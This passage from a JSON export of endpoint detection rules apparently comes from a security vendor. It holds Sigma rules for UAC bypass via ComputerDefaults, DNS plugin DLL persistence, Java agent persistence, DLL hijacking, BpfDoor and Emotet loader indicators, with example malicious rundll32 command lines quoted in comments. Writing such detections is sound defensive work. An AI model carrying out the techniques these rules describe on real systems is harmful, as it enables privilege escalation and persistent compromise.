Files\\MALightingTechnology\\\\*\\bin\\app_system.exe'\n\n # https://github.com/abbodi1406/BatUtil/blob/master/OfficeScrubber/OfficeScrubber.cmd#L133\n exclusion_officescrubber:\n ProcessParentCommandLine|startswith: 'conhost.exe powershell -nop -c $t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0);'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b8e64347-bbc6-4698-b322-4fa2b28bfe9a",
"rule_name": "Indirect Command Executed via conhost.exe",
"rule_description": "Detects a suspicious execution of legitimate conhost.exe Windows binary, used to provide an interface between the Command Prompt and the Windows Explorer.\nAttackers can proxy the execution of commands through conhost.exe to bypass application control or security solutions.\nIt is recommended to analyze the actions performed by the spawned process and to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b93f0ab6-c9b8-4459-9d13-f40136d92136",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074484Z",
"creation_date": "2026-03-23T11:45:34.074486Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074491Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/",
"https://any.run/cybersecurity-blog/windows11-uac-bypass/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_computerdefaults.yml",
"content": "title: UAC Bypass Executed via ComputerDefaults\nid: b93f0ab6-c9b8-4459-9d13-f40136d92136\ndescription: |\n Detects a process being spawned by computerdefaults.exe, that can be the result of an UAC bypass via ComputerDefaults.\n ComputerDefaults has autoelevation capabilities and an integrity level of high.\n This is the result of an attack against a ShellExecuteW(\\\"ms-settings:defaultapps\\\") call inside computerdefaults.exe.\n As such, you should look for other alerts related to ms-settings.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\n - https://any.run/cybersecurity-blog/windows11-uac-bypass/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith: '\\computerdefaults.exe'\n - ProcessFakeParentImage: '?:\\Windows\\System32\\ComputerDefaults.exe'\n\n exclusion_fp:\n CommandLine:\n - '?:\\windows\\system32\\ie4uinit.exe -reinstall'\n - '?:\\windows\\system32\\unregmp2.exe /setwmpasdefault'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b93f0ab6-c9b8-4459-9d13-f40136d92136",
"rule_name": "UAC Bypass Executed via ComputerDefaults",
"rule_description": "Detects a process being spawned by computerdefaults.exe, that can be the result of an UAC bypass via ComputerDefaults.\nComputerDefaults has autoelevation capabilities and an integrity level of high.\nThis is the result of an attack against a ShellExecuteW(\\\"ms-settings:defaultapps\\\") call inside computerdefaults.exe.\nAs such, you should look for other alerts related to ms-settings.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9479cc4-206c-42ef-a445-6484a31ec6ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089294Z",
"creation_date": "2026-03-23T11:45:34.089296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089300Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://adsecurity.org/?p=4064",
"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83"
],
"name": "t1112_persistence_registry_dns_serverlevelplugindll.yml",
"content": "title: DNS Server ServerLevelPluginDll Persistence Added\nid: b9479cc4-206c-42ef-a445-6484a31ec6ed\ndescription: |\n Detects the installation of a potentially malicious DNS server plugin DLL.\n After restarting the DNS service, this DLL is loaded in the context of the DNS server and code execution is achieved.\n It is recommended to investigate the process which set the registry key and download the DLL added for further analysis.\nreferences:\n - https://adsecurity.org/?p=4064\n - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\ndate: 2020/10/02\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n - EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll'\n - EventType: RenameKey\n NewName: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll'\n filter_empty:\n Details: '(Empty)'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9479cc4-206c-42ef-a445-6484a31ec6ed",
"rule_name": "DNS Server ServerLevelPluginDll Persistence Added",
"rule_description": "Detects the installation of a potentially malicious DNS server plugin DLL.\nAfter restarting the DNS service, this DLL is loaded in the context of the DNS server and code execution is achieved.\nIt is recommended to investigate the process which set the registry key and download the DLL added for further analysis.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b99d0522-5e3d-4809-93e1-d57677eedec3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088865Z",
"creation_date": "2026-03-23T11:45:34.088867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088882Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1546_java_agent_persistence.yml",
"content": "title: Possible Java AgentLib/AgentPath Persistence Added\nid: b99d0522-5e3d-4809-93e1-d57677eedec3\ndescription: |\n Detect a suspicious registry changes in the environment variables related to a Java persistence technique.\n This binary, which is digitally signed by Oracle, can be used to load malicious DLLs whose path was written in the registry.\n Attackers may use it to bypass security restrictions as Java is usually a trusted binary. DLL execution happens each time Java is started on the infected system.\n It is recommended to determine if malicious DLLs are being executed upon Java startup, assess the integrity of the Java binary, and monitor for associated suspicious processes.\nreferences:\n - https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/08\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKU\\\\*\\Environment\\JAVA_TOOL_OPTIONS'\n - 'HKU\\\\*\\Environment\\_JAVA_OPTIONS'\n - 'HKU\\\\*\\Environment\\IBM_JAVA_OPTIONS'\n Details|contains:\n - '-agentpath:'\n - '-agentlib:'\n\n condition: selection\nlevel: medium\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b99d0522-5e3d-4809-93e1-d57677eedec3",
"rule_name": "Possible Java AgentLib/AgentPath Persistence Added",
"rule_description": "Detect a suspicious registry changes in the environment variables related to a Java persistence technique.\nThis binary, which is digitally signed by Oracle, can be used to load malicious DLLs whose path was written in the registry.\nAttackers may use it to bypass security restrictions as Java is usually a trusted binary. DLL execution happens each time Java is started on the infected system.\nIt is recommended to determine if malicious DLLs are being executed upon Java startup, assess the integrity of the Java binary, and monitor for associated suspicious processes.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9b26f66-0e18-4a6b-9416-29c52ccd4a3d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599465Z",
"creation_date": "2026-03-23T11:45:34.599468Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599476Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_typeperf.yml",
"content": "title: DLL Hijacking via typeperf.exe\nid: b9b26f66-0e18-4a6b-9416-29c52ccd4a3d\ndescription: |\n Detects potential Windows DLL Hijacking via typeperf.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'typeperf.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\pdh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9b26f66-0e18-4a6b-9416-29c52ccd4a3d",
"rule_name": "DLL Hijacking via typeperf.exe",
"rule_description": "Detects potential Windows DLL Hijacking via typeperf.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9ba963c-9b27-4458-84b7-c2de9615e0ce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613100Z",
"creation_date": "2026-03-23T11:45:34.613103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613111Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
"https://dfir.ch/posts/strace/",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
"https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_bpfdoor_suspicious_execution.yml",
"content": "title: Suspicious File Creation Related to BpfDoor\nid: b9ba963c-9b27-4458-84b7-c2de9615e0ce\ndescription: |\n Detects the creation of files with names linked to the BpfDoor backdoor.\n BpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\n Those names are related to files that are written by BpfDoor as part of its initialization process.\n It is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor\n - https://dfir.ch/posts/strace/\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/02/02\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.Filesystem\n - classification.Linux.Trojan.BpfDoor\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/var/run/haldrund.pid'\n - '/dev/shm/kdmtmpflush'\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9ba963c-9b27-4458-84b7-c2de9615e0ce",
"rule_name": "Suspicious File Creation Related to BpfDoor",
"rule_description": "Detects the creation of files with names linked to the BpfDoor backdoor.\nBpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\nThose names are related to files that are written by BpfDoor as part of its initialization process.\nIt is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2025-01-30",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9c46a36-6d32-4268-87fb-12db0ddaa32e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604078Z",
"creation_date": "2026-03-23T11:45:34.604081Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604089Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html"
],
"name": "t1218_011_emotet_december_2020_campaign.yml",
"content": "title: Possible Emotet Loader via Rundll32\nid: b9c46a36-6d32-4268-87fb-12db0ddaa32e\ndescription: |\n Detects a December 2020 Emotet campaign featuring a DLL loaded by rundll32.exe with an export being RunDLL or #1.\n Emotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID.\n Emotet first emerged in June 2014, initially targeting the financial sector, and has expanded to multiple verticals over time.\n It is recommended to analyze actions and network connection performed by RunDLL32 and to analyze the loaded DLL to look for malicious content.\nreferences:\n - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html\ndate: 2021/01/14\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - attack.s0367\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.Emotet\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_commandline:\n # loader / downloader\n # \"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\XXXXXX\\Y559jsv\\Iewfmy3\\Ppnq9j.dll,#1\n # final payload\n # C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\XXXXXXX\\AppData\\Local\\Fbdo\\mwnjpc.eab\",RunDLL\n CommandLine:\n - '*\\appdata\\local\\\\*\",RunDLL*'\n - '*\\appdata\\local\\\\*,RunDLL*'\n - '*:\\users\\\\*??????.dll,#1*' # might be a little too \"broad\"\n # - ',#1' too generic - function load by ordinal is not Emotet specific\n\n exclusion_fp:\n CommandLine|contains:\n # exclude xxx.dll,RunDLL samples (shouldn't have many)\n # here we rely on the fact that emotet samples don't have a DLL extension, but a random one\n - '.dll,RunDLL'\n - '.dll\",RunDLL'\n\n condition: all of selection_* and 
not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9c46a36-6d32-4268-87fb-12db0ddaa32e",
"rule_name": "Possible Emotet Loader via Rundll32",
"rule_description": "Detects a December 2020 Emotet campaign featuring a DLL loaded by rundll32.exe with an export being RunDLL or #1.\nEmotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID.\nEmotet first emerged in June 2014, initially targeting the financial sector, and has expanded to multiple verticals over time.\nIt is recommended to analyze actions and network connection performed by RunDLL32 and to analyze the loaded DLL to look for malicious content.\n",
"rule_creation_date": "2021-01-14",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9f8a579-5b67-4940-94e9-1d38b637280e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625483Z",
"creation_date": "2026-03-23T11:45:34.625485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625489Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_rundll32_extension.yml",
"content": "title: DLL with Suspicious Extension Loaded via RunDLL32\nid: b9f8a579-5b67-4940-94e9-1d38b637280e\ndescription: |\n Detects the suspicious loading a DLL via rundll32.exe with an unusual DLL file extension.\n Adversaries may place DLLs on disk and attempt to mask them as other types of files by changing their file extensions to avoid detection.\n Following this detection, it is recommended to investigate the process tree of RunDLL32 to look for suspicious processes and analyze the loaded DLL for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/12/19\nmodified: 2025/12/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1218.011\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'RUNDLL32.EXE'\n LibraryType: 'Native'\n ImageLoaded|endswith:\n - '.?'\n - '.??'\n - '.???'\n\n filter_known_extensions:\n ImageLoaded|endswith:\n - '.dll'\n - '.tmp'\n - '.ocx'\n - '.cpl'\n - '.inf'\n - '.wcx'\n - '.drv'\n - '.dll.mui'\n - '.bpl'\n - '.exe'\n - '.sys'\n - '.scr'\n\n filter_known_images:\n ImageLoaded|endswith:\n - '\\rundll32.exe'\n - '\\Windows\\System32\\ntoskrnl.exe'\n\n exclusion_spoolsv:\n ImageLoaded|startswith: '?:\\Windows\\System32\\spool\\drivers\\'\n\n exclusion_legitimate_folders:\n ImageLoaded|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\PROGRA~?\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\Syswow64\\'\n - '?:\\Windows\\installer\\'\n\n exclusion_ssnetmon:\n ProcessCommandLine|startswith: 'rundll32 ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,'\n\n exclusion_mojo:\n ProcessCommandLine|contains|all:\n - '--mojo-platform-channel-handle='\n - '--no-sandbox '\n - '--log-file='\n\n exclusion_seagull:\n ProcessCommandLine: 'RunDLL32.exe 
?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\ss#*,DAL_Proxy \\\\\\\\.\\pipe\\Seagull-DriverDLLProxy-????????'\n\n exclusion_musnotofication:\n ProcessCommandLine:\n - 'rundll32.exe ?:\\Windows\\system32\\MusNotification.exe'\n - 'rundll32.exe ?:\\Windows\\system32\\MusNotification.exe Display'\n - 'rundll32.exe ?:\\Windows\\system32\\MusNotification.exe LogonUpdateResults'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_runtelemetry:\n ProcessCommandLine|startswith: '?:\\WINDOWS\\system32\\rundll32.exe invagent,RunUpdate -noappraiser '\n ProcessParentCommandLine: '?:\\Windows\\system32\\rundll32.exe generaltel.dll,RunTelemetry -maintenance'\n\n exclusion_canon:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe fdprint,InvokeTask /ss *#schemas.canon.com#Scanner#*'\n\n exclusion_legitimate_images:\n ImageLoaded:\n # Windhawk\n - '?:\\ProgramData\\Windhawk\\Engine\\mods\\\\*\\\\*.whl'\n - '?:\\Users\\\\*\\Downloads\\Windhawk\\AppData\\Engine\\Mods\\\\*\\\\*.whl'\n # Skel\n - '?:\\Users\\\\*\\AppData\\Local\\\\*\\SKEL\\\\*.Tls'\n # Radvision\n - '?:\\Users\\\\*\\AppData\\Local\\Radvision\\Installer\\Package\\\\*.pkg'\n # DocRouter\n - '*\\DocRouter\\RFI*.ndr'\n # KSC\n - '*\\Plugins\\ksvla*.windows.plg\\basegui.ppl'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9f8a579-5b67-4940-94e9-1d38b637280e",
"rule_name": "DLL with Suspicious Extension Loaded via RunDLL32",
"rule_description": "Detects the suspicious loading of a DLL via rundll32.exe with an unusual DLL file extension.\nAdversaries may place DLLs on disk and attempt to mask them as other types of files by changing their file extensions to avoid detection.\nFollowing this detection, it is recommended to investigate the process tree of RunDLL32 to look for suspicious processes and analyze the loaded DLL for malicious content.\n",
"rule_creation_date": "2025-12-19",
"rule_modified_date": "2025-12-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b9fa1c53-0625-4fe7-8725-9eec7202b1f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
